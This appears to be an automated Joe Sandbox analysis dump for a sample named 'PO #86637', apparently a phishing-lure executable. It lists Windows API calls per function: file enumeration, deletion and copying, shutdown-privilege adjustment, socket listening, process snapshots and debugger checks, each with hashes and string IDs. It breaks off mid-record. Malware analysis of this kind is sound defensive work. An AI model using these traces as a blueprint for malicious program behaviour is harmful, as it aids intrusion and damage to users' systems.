                      • API String ID: 2383988440-0
                      APIs
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                        • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • _wcscat.LIBCMT ref: 0044BD94
                      • _wcscat.LIBCMT ref: 0044BDBD
                      • __wsplitpath.LIBCMT ref: 0044BDEA
                      • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                      • _wcscpy.LIBCMT ref: 0044BE71
                      • _wcscat.LIBCMT ref: 0044BE83
                      • _wcscat.LIBCMT ref: 0044BE95
                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                      • DeleteFileW.KERNEL32(?), ref: 0044BED3
                      • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                      • DeleteFileW.KERNEL32(?), ref: 0044BF15
                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                      • FindClose.KERNEL32(00000000), ref: 0044BF33
                      • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                      • FindClose.KERNEL32(00000000), ref: 0044BF7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                      • String ID: \*.*
                      • API String ID: 2188072990-1173974218
                      • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                      • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                      • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                      • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                      • FindClose.KERNEL32(00000000), ref: 00478924
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                      • __swprintf.LIBCMT ref: 004789D3
                      • __swprintf.LIBCMT ref: 00478A1D
                      • __swprintf.LIBCMT ref: 00478A4B
                      • __swprintf.LIBCMT ref: 00478A79
                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                      • __swprintf.LIBCMT ref: 00478AA7
                      • __swprintf.LIBCMT ref: 00478AD5
                      • __swprintf.LIBCMT ref: 00478B03
                      Strings
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 999945258-2428617273
                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                      • __wsplitpath.LIBCMT ref: 00403492
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • _wcscpy.LIBCMT ref: 004034A7
                      • _wcscat.LIBCMT ref: 004034BC
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                      • _wcscpy.LIBCMT ref: 004035A0
                      • _wcslen.LIBCMT ref: 00403623
                      • _wcslen.LIBCMT ref: 0040367D
                      Strings
                      • Error opening the file, xrefs: 00428231
                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                      • Unterminated string, xrefs: 00428348
                      • _, xrefs: 0040371C
                      Similarity
                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                      • API String ID: 3393021363-188983378
                      • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                      • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                      • FindClose.KERNEL32(00000000), ref: 00431B20
                      • FindClose.KERNEL32(00000000), ref: 00431B34
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                      Strings
                      Similarity
                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1409584000-438819550
                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                      • __swprintf.LIBCMT ref: 00431C2E
                      • _wcslen.LIBCMT ref: 00431C3A
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                      Strings
                      Similarity
                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                      • String ID: :$\$\??\%s
                      • API String ID: 2192556992-3457252023
                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                      APIs
                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                      • __swprintf.LIBCMT ref: 004722B9
                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                      Strings
                      Similarity
                      • API ID: FolderPath$LocalTime__swprintf
                      • String ID: %.3d
                      • API String ID: 3337348382-986655627
                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                      • FindClose.KERNEL32(00000000), ref: 0044291C
                      • FindClose.KERNEL32(00000000), ref: 00442930
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                      • FindClose.KERNEL32(00000000), ref: 004429D4
                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                      • FindClose.KERNEL32(00000000), ref: 004429E2
                      Strings
                      Similarity
                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 2640511053-438819550
                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                      APIs
                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                      • GetLastError.KERNEL32 ref: 00433414
                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                      Strings
                      Similarity
                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                      • String ID: SeShutdownPrivilege
                      • API String ID: 2938487562-3733053543
                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                      APIs
                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                      • CopySid.ADVAPI32(00000000), ref: 00446271
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                      Similarity
                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                      • String ID:
                      • API String ID: 1255039815-0
                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                      APIs
                      • __swprintf.LIBCMT ref: 00433073
                      • __swprintf.LIBCMT ref: 00433085
                      • __wcsicoll.LIBCMT ref: 00433092
                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                      • LockResource.KERNEL32(00000000), ref: 004330CA
                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                      • LockResource.KERNEL32(?), ref: 00433120
                      Similarity
                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                      • String ID:
                      • API String ID: 1158019794-0
                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                      APIs
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                      • GetLastError.KERNEL32 ref: 0045D6BF
                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                      Strings
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$_strncmp
                      • String ID: @oH$\$^$h
                      • API String ID: 2175499884-3701065813
                      • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                      • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                      • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                      • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLast$closesocket$bindlistensocket
                      • String ID:
                      • API String ID: 540024437-0
                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                      • API String ID: 0-2872873767
                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                      • __wsplitpath.LIBCMT ref: 00475644
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • _wcscat.LIBCMT ref: 00475657
                      • __wcsicoll.LIBCMT ref: 0047567B
                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                      • String ID:
                      • API String ID: 2547909840-0
                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                      • FindClose.KERNEL32(?), ref: 004525FF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                      • String ID: *.*$\VH
                      • API String ID: 2786137511-2657498754
                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                      • String ID: pqI
                      • API String ID: 2579439406-2459173057
                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                      APIs
                      • __wcsicoll.LIBCMT ref: 00433349
                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                      • __wcsicoll.LIBCMT ref: 00433375
                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
